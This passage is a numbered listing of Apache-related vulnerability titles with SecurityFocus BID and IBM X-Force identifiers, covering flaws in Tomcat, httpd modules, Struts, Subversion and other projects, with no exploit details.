14448| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
14449| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
14450| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
14451| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14452| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
14453| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
14454| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
14455| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
14456| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
14457| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
14458| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
14459| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
14460| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
14461| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
14462| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14463| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
14464| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
14465| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
14466| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
14467| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
14468| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
14469| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
14470| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
14471| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
14472| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
14473| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
14474| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
14475| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
14476| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
14477| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
14478| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
14479| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
14480| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
14481| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
14482| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
14483| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
14484| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
14485| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
14486| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
14487| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
14488| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
14489| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
14490| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
14491| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
14492| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
14493| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
14494| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
14495| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
14496| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
14497| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
14498| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
14499| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
14500| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
14501| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
14502| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
14503| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
14504| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
14505| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
14506| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
14507| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
14508| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
14509| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
14510| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
14511| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
14512| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
14513| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
14514| [20527] Apache Mod_TCL Remote Format String Vulnerability
14515| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
14516| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
14517| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
14518| [19106] Apache Tomcat Information Disclosure Vulnerability
14519| [18138] Apache James SMTP Denial Of Service Vulnerability
14520| [17342] Apache Struts Multiple Remote Vulnerabilities
14521| [17095] Apache Log4Net Denial Of Service Vulnerability
14522| [16916] Apache mod_python FileSession Code Execution Vulnerability
14523| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
14524| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
14525| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
14526| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
14527| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
14528| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
14529| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
14530| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
14531| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
14532| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
14533| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
14534| [15177] PHP Apache 2 Local Denial of Service Vulnerability
14535| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
14536| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
14537| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
14538| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
14539| [14106] Apache HTTP Request Smuggling Vulnerability
14540| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
14541| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
14542| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
14543| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
14544| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
14545| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
14546| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
14547| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
14548| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
14549| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
14550| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
14551| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
14552| [11471] Apache mod_include Local Buffer Overflow Vulnerability
14553| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
14554| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
14555| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
14556| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
14557| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
14558| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
14559| [11094] Apache mod_ssl Denial Of Service Vulnerability
14560| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
14561| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
14562| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
14563| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
14564| [10478] ClueCentral Apache Suexec Patch Security Weakness
14565| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
14566| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
14567| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
14568| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
14569| [9921] Apache Connection Blocking Denial Of Service Vulnerability
14570| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
14571| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
14572| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
14573| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
14574| [9733] Apache Cygwin Directory Traversal Vulnerability
14575| [9599] Apache mod_php Global Variables Information Disclosure Weakness
14576| [9590] Apache-SSL Client Certificate Forging Vulnerability
14577| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
14578| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
14579| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
14580| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
14581| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
14582| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
14583| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
14584| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
14585| [8898] Red Hat Apache Directory Index Default Configuration Error
14586| [8883] Apache Cocoon Directory Traversal Vulnerability
14587| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
14588| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
14589| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
14590| [8707] Apache htpasswd Password Entropy Weakness
14591| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
14592| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14593| [8226] Apache HTTP Server Multiple Vulnerabilities
14594| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
14595| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
14596| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
14597| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
14598| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
14599| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
14600| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
14601| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
14602| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
14603| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
14604| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
14605| [7255] Apache Web Server File Descriptor Leakage Vulnerability
14606| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
14607| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
14608| [6939] Apache Web Server ETag Header Information Disclosure Weakness
14609| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
14610| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
14611| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
14612| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
14613| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
14614| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
14615| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
14616| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
14617| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
14618| [6117] Apache mod_php File Descriptor Leakage Vulnerability
14619| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
14620| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
14621| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
14622| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
14623| [5992] Apache HTDigest Insecure Temporary File Vulnerability
14624| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
14625| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
14626| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
14627| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
14628| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
14629| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
14630| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
14631| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
14632| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
14633| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
14634| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
14635| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
14636| [5485] Apache 2.0 Path Disclosure Vulnerability
14637| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
14638| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
14639| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
14640| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
14641| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
14642| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
14643| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
14644| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
14645| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
14646| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
14647| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
14648| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
14649| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
14650| [4437] Apache Error Message Cross-Site Scripting Vulnerability
14651| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
14652| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
14653| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
14654| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
14655| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
14656| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
14657| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
14658| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
14659| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
14660| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
14661| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
14662| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
14663| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
14664| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
14665| [3596] Apache Split-Logfile File Append Vulnerability
14666| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
14667| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
14668| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
14669| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
14670| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
14671| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
14672| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
14673| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
14674| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
14675| [3169] Apache Server Address Disclosure Vulnerability
14676| [3009] Apache Possible Directory Index Disclosure Vulnerability
14677| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
14678| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
14679| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
14680| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
14681| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
14682| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
14683| [2216] Apache Web Server DoS Vulnerability
14684| [2182] Apache /tmp File Race Vulnerability
14685| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
14686| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
14687| [1821] Apache mod_cookies Buffer Overflow Vulnerability
14688| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
14689| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
14690| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
14691| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
14692| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
14693| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
14694| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
14695| [1457] Apache::ASP source.asp Example Script Vulnerability
14696| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
14697| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
14698|
14699| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14700| [86258] Apache CloudStack text fields cross-site scripting
14701| [85983] Apache Subversion mod_dav_svn module denial of service
14702| [85875] Apache OFBiz UEL code execution
14703| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
14704| [85871] Apache HTTP Server mod_session_dbd unspecified
14705| [85756] Apache Struts OGNL expression command execution
14706| [85755] Apache Struts DefaultActionMapper class open redirect
14707| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
14708| [85574] Apache HTTP Server mod_dav denial of service
14709| [85573] Apache Struts Showcase App OGNL code execution
14710| [85496] Apache CXF denial of service
14711| [85423] Apache Geronimo RMI classloader code execution
14712| [85326] Apache Santuario XML Security for C++ buffer overflow
14713| [85323] Apache Santuario XML Security for Java spoofing
14714| [85319] Apache Qpid Python client SSL spoofing
14715| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
14716| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
14717| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
14718| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
14719| [84952] Apache Tomcat CVE-2012-3544 denial of service
14720| [84763] Apache Struts CVE-2013-2135 security bypass
14721| [84762] Apache Struts CVE-2013-2134 security bypass
14722| [84719] Apache Subversion CVE-2013-2088 command execution
14723| [84718] Apache Subversion CVE-2013-2112 denial of service
14724| [84717] Apache Subversion CVE-2013-1968 denial of service
14725| [84577] Apache Tomcat security bypass
14726| [84576] Apache Tomcat symlink
14727| [84543] Apache Struts CVE-2013-2115 security bypass
14728| [84542] Apache Struts CVE-2013-1966 security bypass
14729| [84154] Apache Tomcat session hijacking
14730| [84144] Apache Tomcat denial of service
14731| [84143] Apache Tomcat information disclosure
14732| [84111] Apache HTTP Server command execution
14733| [84043] Apache Virtual Computing Lab cross-site scripting
14734| [84042] Apache Virtual Computing Lab cross-site scripting
14735| [83782] Apache CloudStack information disclosure
14736| [83781] Apache CloudStack security bypass
14737| [83720] Apache ActiveMQ cross-site scripting
14738| [83719] Apache ActiveMQ denial of service
14739| [83718] Apache ActiveMQ denial of service
14740| [83263] Apache Subversion denial of service
14741| [83262] Apache Subversion denial of service
14742| [83261] Apache Subversion denial of service
14743| [83259] Apache Subversion denial of service
14744| [83035] Apache mod_ruid2 security bypass
14745| [82852] Apache Qpid federation_tag security bypass
14746| [82851] Apache Qpid qpid::framing::Buffer denial of service
14747| [82758] Apache Rave User RPC API information disclosure
14748| [82663] Apache Subversion svn_fs_file_length() denial of service
14749| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
14750| [82641] Apache Qpid AMQP denial of service
14751| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
14752| [82618] Apache Commons FileUpload symlink
14753| [82360] Apache HTTP Server manager interface cross-site scripting
14754| [82359] Apache HTTP Server hostnames cross-site scripting
14755| [82338] Apache Tomcat log/logdir information disclosure
14756| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
14757| [82268] Apache OpenJPA deserialization command execution
14758| [81981] Apache CXF UsernameTokens security bypass
14759| [81980] Apache CXF WS-Security security bypass
14760| [81398] Apache OFBiz cross-site scripting
14761| [81240] Apache CouchDB directory traversal
14762| [81226] Apache CouchDB JSONP code execution
14763| [81225] Apache CouchDB Futon user interface cross-site scripting
14764| [81211] Apache Axis2/C SSL spoofing
14765| [81167] Apache CloudStack DeployVM information disclosure
14766| [81166] Apache CloudStack AddHost API information disclosure
14767| [81165] Apache CloudStack createSSHKeyPair API information disclosure
14768| [80518] Apache Tomcat cross-site request forgery security bypass
14769| [80517] Apache Tomcat FormAuthenticator security bypass
14770| [80516] Apache Tomcat NIO denial of service
14771| [80408] Apache Tomcat replay-countermeasure security bypass
14772| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
14773| [80317] Apache Tomcat slowloris denial of service
14774| [79984] Apache Commons HttpClient SSL spoofing
14775| [79983] Apache CXF SSL spoofing
14776| [79830] Apache Axis2/Java SSL spoofing
14777| [79829] Apache Axis SSL spoofing
14778| [79809] Apache Tomcat DIGEST security bypass
14779| [79806] Apache Tomcat parseHeaders() denial of service
14780| [79540] Apache OFBiz unspecified
14781| [79487] Apache Axis2 SAML security bypass
14782| [79212] Apache Cloudstack code execution
14783| [78734] Apache CXF SOAP Action security bypass
14784| [78730] Apache Qpid broker denial of service
14785| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
14786| [78563] Apache mod_pagespeed module unspecified cross-site scripting
14787| [78562] Apache mod_pagespeed module security bypass
14788| [78454] Apache Axis2 security bypass
14789| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
14790| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
14791| [78321] Apache Wicket unspecified cross-site scripting
14792| [78183] Apache Struts parameters denial of service
14793| [78182] Apache Struts cross-site request forgery
14794| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
14795| [77987] mod_rpaf module for Apache denial of service
14796| [77958] Apache Struts skill name code execution
14797| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
14798| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
14799| [77568] Apache Qpid broker security bypass
14800| [77421] Apache Libcloud spoofing
14801| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
14802| [77046] Oracle Solaris Apache HTTP Server information disclosure
14803| [76837] Apache Hadoop information disclosure
14804| [76802] Apache Sling CopyFrom denial of service
14805| [76692] Apache Hadoop symlink
14806| [76535] Apache Roller console cross-site request forgery
14807| [76534] Apache Roller weblog cross-site scripting
14808| [76152] Apache CXF elements security bypass
14809| [76151] Apache CXF child policies security bypass
14810| [75983] MapServer for Windows Apache file include
14811| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
14812| [75558] Apache POI denial of service
14813| [75545] PHP apache_request_headers() buffer overflow
14814| [75302] Apache Qpid SASL security bypass
14815| [75211] Debian GNU/Linux apache 2 cross-site scripting
14816| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
14817| [74871] Apache OFBiz FlexibleStringExpander code execution
14818| [74870] Apache OFBiz multiple cross-site scripting
14819| [74750] Apache Hadoop unspecified spoofing
14820| [74319] Apache Struts XSLTResult.java file upload
14821| [74313] Apache Traffic Server header buffer overflow
14822| [74276] Apache Wicket directory traversal
14823| [74273] Apache Wicket unspecified cross-site scripting
14824| [74181] Apache HTTP Server mod_fcgid module denial of service
14825| [73690] Apache Struts OGNL code execution
14826| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
14827| [73100] Apache MyFaces in directory traversal
14828| [73096] Apache APR hash denial of service
14829| [73052] Apache Struts name cross-site scripting
14830| [73030] Apache CXF UsernameToken security bypass
14831| [72888] Apache Struts lastName cross-site scripting
14832| [72758] Apache HTTP Server httpOnly information disclosure
14833| [72757] Apache HTTP Server MPM denial of service
14834| [72585] Apache Struts ParameterInterceptor security bypass
14835| [72438] Apache Tomcat Digest security bypass
14836| [72437] Apache Tomcat Digest security bypass
14837| [72436] Apache Tomcat DIGEST security bypass
14838| [72425] Apache Tomcat parameter denial of service
14839| [72422] Apache Tomcat request object information disclosure
14840| [72377] Apache HTTP Server scoreboard security bypass
14841| [72345] Apache HTTP Server HTTP request denial of service
14842| [72229] Apache Struts ExceptionDelegator command execution
14843| [72089] Apache Struts ParameterInterceptor directory traversal
14844| [72088] Apache Struts CookieInterceptor command execution
14845| [72047] Apache Geronimo hash denial of service
14846| [72016] Apache Tomcat hash denial of service
14847| [71711] Apache Struts OGNL expression code execution
14848| [71654] Apache Struts interfaces security bypass
14849| [71620] Apache ActiveMQ failover denial of service
14850| [71617] Apache HTTP Server mod_proxy module information disclosure
14851| [71508] Apache MyFaces EL security bypass
14852| [71445] Apache HTTP Server mod_proxy security bypass
14853| [71203] Apache Tomcat servlets privilege escalation
14854| [71181] Apache HTTP Server ap_pregsub() denial of service
14855| [71093] Apache HTTP Server ap_pregsub() buffer overflow
14856| [70336] Apache HTTP Server mod_proxy information disclosure
14857| [69804] Apache HTTP Server mod_proxy_ajp denial of service
14858| [69472] Apache Tomcat AJP security bypass
14859| [69396] Apache HTTP Server ByteRange filter denial of service
14860| [69394] Apache Wicket multi window support cross-site scripting
14861| [69176] Apache Tomcat XML information disclosure
14862| [69161] Apache Tomcat jsvc information disclosure
14863| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
14864| [68541] Apache Tomcat sendfile information disclosure
14865| [68420] Apache XML Security denial of service
14866| [68238] Apache Tomcat JMX information disclosure
14867| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
14868| [67804] Apache Subversion control rules information disclosure
14869| [67803] Apache Subversion control rules denial of service
14870| [67802] Apache Subversion baselined denial of service
14871| [67672] Apache Archiva multiple cross-site scripting
14872| [67671] Apache Archiva multiple cross-site request forgery
14873| [67564] Apache APR apr_fnmatch() denial of service
14874| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
14875| [67515] Apache Tomcat annotations security bypass
14876| [67480] Apache Struts s:submit information disclosure
14877| [67414] Apache APR apr_fnmatch() denial of service
14878| [67356] Apache Struts javatemplates cross-site scripting
14879| [67354] Apache Struts Xwork cross-site scripting
14880| [66676] Apache Tomcat HTTP BIO information disclosure
14881| [66675] Apache Tomcat web.xml security bypass
14882| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
14883| [66241] Apache HttpComponents information disclosure
14884| [66154] Apache Tomcat ServletSecurity security bypass
14885| [65971] Apache Tomcat ServletSecurity security bypass
14886| [65876] Apache Subversion mod_dav_svn denial of service
14887| [65343] Apache Continuum unspecified cross-site scripting
14888| [65162] Apache Tomcat NIO connector denial of service
14889| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
14890| [65160] Apache Tomcat HTML Manager interface cross-site scripting
14891| [65159] Apache Tomcat ServletContect security bypass
14892| [65050] Apache CouchDB web-based administration UI cross-site scripting
14893| [64773] Oracle HTTP Server Apache Plugin unauthorized access
14894| [64473] Apache Subversion blame -g denial of service
14895| [64472] Apache Subversion walk() denial of service
14896| [64407] Apache Axis2 CVE-2010-0219 code execution
14897| [63926] Apache Archiva password privilege escalation
14898| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
14899| [63493] Apache Archiva credentials cross-site request forgery
14900| [63477] Apache Tomcat HttpOnly session hijacking
14901| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
14902| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
14903| [62959] Apache Shiro filters security bypass
14904| [62790] Apache Perl cgi module denial of service
14905| [62576] Apache Qpid exchange denial of service
14906| [62575] Apache Qpid AMQP denial of service
14907| [62354] Apache Qpid SSL denial of service
14908| [62235] Apache APR-util apr_brigade_split_line() denial of service
14909| [62181] Apache XML-RPC SAX Parser information disclosure
14910| [61721] Apache Traffic Server cache poisoning
14911| [61202] Apache Derby BUILTIN authentication functionality information disclosure
14912| [61186] Apache CouchDB Futon cross-site request forgery
14913| [61169] Apache CXF DTD denial of service
14914| [61070] Apache Jackrabbit search.jsp SQL injection
14915| [61006] Apache SLMS Quoting cross-site request forgery
14916| [60962] Apache Tomcat time cross-site scripting
14917| [60883] Apache mod_proxy_http information disclosure
